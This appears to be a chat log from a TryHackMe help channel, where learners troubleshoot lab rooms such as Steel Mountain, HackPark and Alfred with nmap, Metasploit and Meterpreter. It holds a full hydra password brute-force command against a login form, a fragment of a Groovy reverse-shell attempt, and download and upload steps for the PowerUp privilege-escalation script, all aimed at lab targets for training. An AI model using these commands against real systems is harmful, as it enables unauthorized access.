so it scans all ports :)
I'm pretty sure by default it only scans 10k ports.
By default it scans the top 1000 ports 🙂
I'm stuck on steel mountain. I'm unsure of some options in metasploit
is srvhost the same as lhost?
I'm not sure what the srvhost address should be
I'm on Networking and I'm trying to spoof a MAC address, but I don't know what to do.
It's the interface address it'll use for the webserver etc that it's hosting something on. 0.0.0.0 is usually fine.
@keen iris thanks
Gave +1 Rep to @keen iris
@keen iris How do I enter a PowerShell session from Meterpreter?
Have you googled that?
Hi Ladies and Gentlemen,
I have a small problem with the HackPark room. I try to upload my payload and it fails to upload.
I use a Kali VMware VM; I try to upload the payload with the file manager inside the first post.
Hello everyone! I was wondering if anyone else working on the "Relevant" room would be willing to chat about enumeration of this box? Thanks!
Nice, we can move to DM if needed. Just trying to make sure I'm seeing everything, since after running nmap, dirb/gobuster and doing some SMB scanning I found a small lead that seems to be turning into a dead end, unless I'm entirely forgetting something, since I'm not as used to the Windows-based environment.
just trying to see if I'm going in the right direction for now
I'm stuck on the final task for Steel Mountain. I get an error message when I run the script
SyntaxError: (unicode error) 'unicodeescape' codec can't decode bytes in position 2-3: truncated \UXXXXXXXX escape
I'm not sure what to do
Hello guys! I’m stuck at Kenobi room task 3 question 5
I am currently doing the room hackpark
When running hydra to bruteforce, the password shows up like this. Can anyone help me with this?
[80][http-post-form] host: 10.10.136.244 login: admin password: <div><embed src=
I ran this command btw: hydra -l admin -P /home/kali/Downloads/rockyou.txt 10.10.136.244 http-post-form "/login.aspx?ReturnURL=/admin/:_VIEWSTATE=68Oh7xYm34v5dw57n%2Fzk%2BOzTaNS9CRtn2KN8FiHlh%2BWgduUZL9o9%2FREtxOZm%2B0jI49TxEaUX06RSshhGK7P4DFW5M972rcYaSmyzuo92r5sjh74C21dq8CAZ1cIH0DEqXs9OzopySlwTUau%2Bo%2FgHYh7E6c0hpuhkP1X0ou2oSMkGzSP4&__EVENTVALIDATION=%2BIFfio%2FS2Bsa61EkuZdSWJW8qcmH7lTa7pnDNFkw9HHE76yfdnd0EZTkckhm8JgT69MXzzTyxTOkWtq6QA1A5tyWRdFpLq5bM4av4Sn%2B1nRvXzXT8EhwB5R4ghZP2FdKsZBeGzxy5vw7yeX1ybFeZP4Ach3FrOMQIYGaKZPJ4PECNjnk&ctl00%24MainContent%24LoginUser%24UserName=admin&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"
Which task are you on
hydra -f -l admin -P /data/src/wordlists/rockyou.txt 10.10.79.198 http-postfor.
.
@swift coral
@neon glacier instead of just giving them the password, please help them get to that point themselves
Yeah did that already. I’m done with my room
Hey everyone. I know a lot of you have encountered this issue, but in the Brainstorm room, it is said to have 6 ports open but only 3 are displayed as open. My nmap command is `sudo nmap -sV -Pn -p- IP -T4`
Run it with and without p flag
ok thanks! I'll try 🙂
Gave +1 Rep to @neon glacier
Hello guys! Can I get help at room Steel Mountain Task 3 Q1?
What do you need help with?
I write the command given to me: upload /opt/windows/powersploit/Privesc/PowerUp.ps1
It will not upload
Can you verify and share a screenshot please?
!docs verify
Done ✅
Did you download the script?
yes
Where is it located on your host machine?
So you'll do upload PATH TO PowerUp.ps1
Just the command
Sorry😅
I can't understand you, just the command
I wrote it on meterpreter and it didn’t work
- confirm which directory is the PowerUp.ps1 on your system.
- in meterpreter > upload <insert-path-here>...
for example if your script is in downloads:
upload ~/Downloads/PowerUp.ps1
if it's in some random folder buried deep in dirt:
upload /magic-folder/where/no/gnome/has/ever/ventured/into/PowerUp.ps1
When I said PATH I was meaning the path on your host machine to the .ps1 file
Thanks! Anyways
Gave +1 Rep to @hybrid mirage
Thanks! To you too
Happy to help!
I’m sorry to bring bad news
But I wrote the command and did not work
Any Ideas 💡
The folder saved in PowerSploit.git
Can someone show me a demonstration? Please
If you're having a rough time downloading the correct thing and not even realizing you haven't downloaded PowerUp.ps1 but rather something completely else, not to sound mean, but I'd suggest taking a step back and learning more fundamentals / switching to easier learning paths, or else you'll have a really rough time going forward. If you're still dead set on continuing, this is the syntax to download it properly ||wget https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1||
check the link provided in the room
Sorry guys I really gave you a hard time
Yk sometimes that you realize that you’re right but actually wrong 😑
Thanks!
Gave +1 Rep to @ivory quartz
Anyone who can help me out on Steel Mountain? MSF acting weird.
What do you need help with? More context the better!
I fixed it haha, but I left out the context so as not to spoil it for anyone. (That's the norm in HTB anyway)
That's good. But we need to know what to help with haha. You can also use ||these|| to help hide
||looks like this||
Ah cheers, will do!
Could someone explain what the difference really is between exploit -j and exploit -z in Metasploit?
and also the difference between sessions -i ID and just sessions ID
Maybe this might be a more appropriate room to ask the question.
Working on Buffer Overflow, I have removed a bad char from my payload, but it still shows as a bad char. Situation: initially, a0, a1, ad, ae are listed as the bad chars. I removed a0, restarted Immunity, ran exploit.py, ran Mona, and I now see a0, ad, ae as the remaining bad chars, which shouldn't be the case as I've removed a0. Either I'm not getting the concept, or I'm doing something wrong.
Would appreciate some enlightenment.
exploit -j simply runs whatever module you're using as a background "job" aka process. exploit -z simply stops msfconsole from automatically interacting with a session after a successful exploit.
I know, but concretely they both end up in the background as a session, so what does doing one or the other change?
exploit -j will run the actual exploit in a process separate from msfconsole itself. exploit -z doesn't do that, it uses the msfconsole process to launch the exploit. It just doesn't automatically interact with a shell when you get one.
Why when I try to execute ||PowerUp.ps1|| it will not work
Please show us what you're doing and elaborate on what you mean by "it will not work"
Hi everyone! I am working on Alfred and working on getting a reverse shell from the Script Console. I am getting an error that seems the String for my IP address is not right in some way. Anyone know what I may need to change? (obfuscated the actual ip)
Script1.groovy: 1: unexpected token: 2.71 @ line 1, column 19.
String host = ”10.x.xx.xx";
following this guide - https://coldfusionx.github.io/posts/Groovy_RCE/
nevermind, tried again and got it. Feel free to delete 🙂
Hello everyone! I have a problem with Brainstorm; it seems like FTP on it is not working correctly. Yesterday and today I cannot connect either by ftp via the CLI or by FileZilla.
Anyone have any insight as to the box "Relevant"? -- I've accidentally crashed it with gobuster once, switched to dirsearch for the further HTTP enumeration and that hung at 9% (2 times in a row). I got curious to see what I was doing wrong in a writeup, which led me to the correct URI ||on $TARGET_IP:49663/nt4wrksv||, but that just brings me to an entirely blank/invalid page, so I'm wondering if there's some sort of configuration setting I have wrong somewhere. Any and all help is appreciated.
if you navigate to http://10.10.10.10 does it load the image?
Was someone able to crack the hash for Attacking Kerberos recently?
same
Can someone from THM staff take a look?
- Did you copy the hash over manually? - If yes, clean it up so there are no spaces.
- Are you using the modified wordlist?
- There are no spaces and no newlines; tried with a single file with 2 hashes and split into two files.
- I tried with the one provided in the task and rockyou; both seem too fast and neither cracks the hashes. Maybe I'm using the newest hashcat, 6.2.5.
Are you using --force?
Tried no success
Don't use --force under any circumstances.